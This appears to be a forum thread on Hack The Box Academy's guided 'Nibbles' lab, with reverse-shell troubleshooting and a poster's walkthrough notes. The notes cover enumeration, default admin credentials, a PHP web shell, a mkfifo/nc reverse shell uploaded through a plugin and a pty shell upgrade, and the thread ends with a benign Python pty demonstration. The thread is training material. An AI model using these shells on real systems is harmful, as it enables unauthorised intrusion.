Getting Started - Nibbles - Initial Foothold

Hi guys,
I have problems with the guided Nibbles machine. When I try to make the RCE connection with the reverse shell, I don’t succeed with the connection, but it doesn’t give me any error.

I share screenshots.



EDIT: I also tried it with Metasploit, but it gives me this error.

It could be that nc is not installed on the target host. Maybe try starting with a simple php shell? Something like:

<?php system($_GET['cmd']); ?>

Then do some system enumeration and try to get a better shell. If the above does not work, something is wrong with your payload delivery.

Oooh okay. I assume that nc was installed because it’s a guided machine.
I will try with other shell payloads.

Hi, have you solved this problem? The problem I encountered is the same as yours, and I have tried many methods but still have no idea. :sob:

Hey, I found the reason! My IP number is wrong. I used the academic workstation. When I use ‘ifconfig’, it shows the IP which can’t be connected! The right listen IP is just on the bash window. (nooo) I hope it can help anyone else to save hours!!! :melting_face: :joy:

Sorry for the delay, my problem was because my default Ubuntu firewall was rejecting the reverse shells. I recommend you use a pentest distro or disable the firewall.

Try different msf shell payloads, disable the UFW firewall, or, if you want to disable them, add a table with rules that exclude an x IP (your IP) from x TCP port to y TCP, something like:

sudo ufw allow from <yourip/or/tun0> proto tcp to any port <port>

** then the commands depend pretty much on the UFW version

*** if on you put like 9292 from 0-9292, ufw enables all the ports from 9292 and blocks all the ports after 9292 …

Exercise notes:

1). Gain a foothold on the target and submit the user.txt flag

nmap < target ip >
http://< target ip >

  • view source

http://< target ip >/< nibbleblog >
gobuster dir -u http://< target ip >/nibbleblog --wordlist /usr/share/dirb/wordlists/common.txt

Note: Gobuster runs a bunch of words against the directories. The wordlist argument (-w) provides the path to the wordlist. In the command above, the wordlist is pre-installed.

http://< target ip >/nibbleblog/admin/
http://< target ip >/nibbleblog/content/

  • Private
  • users.xml

curl -s http://< target ip >/nibbleblog/content/private/users.xml | xmllint --format -

  • Note: The extension at the end is an argument. A list of curl arguments, here: < curl - How To Use >

  • Note: Tried to do curl -s http://< target ip > /nibbleblog/content/private/users.xml --output-dir “/home/<hack the box account number/” to no avail.

  • Note: In the hack the box walk-through the writer uses:
    gobuster dir -u http://< target ip >/ --wordlist /usr/share/dirb/wordlists/common.txt to check for additional directories. The writer states, “no other additional directories exist,” after the command. The statement appears more valid than not because the writer used the first Gobuster directory search on the http://< target ip >/, not the root of the web-application.

  • Note: Could try password cracking with Hashcat or CeWL.

http://< target ip >/nibbleblog/admin.php

  • admin
  • nibbles


  • My image

ip addr show dev tun0

  • Note: The hack the box guide says ‘< ATTACKING IP >’. The guide also mentions ‘< LISTENING PORT >’.

Right click on home screen of the Hack the Box Terminal

  • Create document > web > php
  • image.php
    • <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc < output of ip addr show dev tun0 > < port of ip addr show dev tun0 > >/tmp/f"); ?>


  • image.php
  • Save changes
    • Note: Invalid responses

sudo nc -lvnp < port of ip addr show dev tun0 >

http://< target ip >/nibbleblog/content/private/plugins/my_image/image.php

Should see:
"Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can’t access tty; job control turned off," in home terminal.

  • id
  • python -c 'import pty; pty.spawn("/bin/bash")'
  • which python3
  • python3 -c 'import pty; pty.spawn("/bin/bash")'
    • cd ~
    • ls
      • cat user.txt

What are the python commands doing?:

  • python -c 'import pty; pty.spawn("/bin/bash")'
  • which python3
  • python3 -c 'import pty; pty.spawn("/bin/bash")'

Looks like the last one gave us capabilities to run bash commands, such as ‘cd ~’; but I am unsure?
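
What `pty.spawn` changes, shown as an added example that is not part of the original posts: the same probe runs once with pipes as its standard streams (the situation behind the "can't access tty; job control turned off" message) and once attached to a pseudo-terminal, which is the setup `pty.spawn` gives the `/bin/bash` it starts. The helper names and the probe are constructed for illustration; Linux and Python 3 are assumed.

```python
import os
import pty
import subprocess
import sys

# Constructed probe: reports whether stdin, stdout and stderr are terminals.
PROBE = (
    "import os;"
    "print(' '.join('tty' if os.isatty(fd) else 'notty' for fd in (0, 1, 2)))"
)


def run_over_pipes():
    """Child whose stdio are pipes, like a shell fed through nc and a FIFO."""
    done = subprocess.run(
        [sys.executable, "-c", PROBE],
        input="", capture_output=True, text=True,
    )
    return done.stdout.strip()


def run_under_pty():
    """Child whose stdio is a pseudo-terminal, as pty.spawn() arranges."""
    master, slave = pty.openpty()
    child = subprocess.Popen(
        [sys.executable, "-c", PROBE],
        stdin=slave, stdout=slave, stderr=slave,
    )
    os.close(slave)  # the parent keeps only the master side
    output = b""
    while True:
        try:
            chunk = os.read(master, 1024)
        except OSError:  # Linux raises EIO once the child closes the slave
            break
        if not chunk:
            break
        output += chunk
    child.wait()
    os.close(master)
    return output.decode().strip()  # strip() also drops the pty's "\r\n"


if __name__ == "__main__":
    print("pipes:", run_over_pipes())
    print("pty:  ", run_under_pty())
```

Programs that check `isatty()` before enabling prompts, job control or line editing behave differently in the two cases, which is why the shell feels "upgraded" after the `pty.spawn` command.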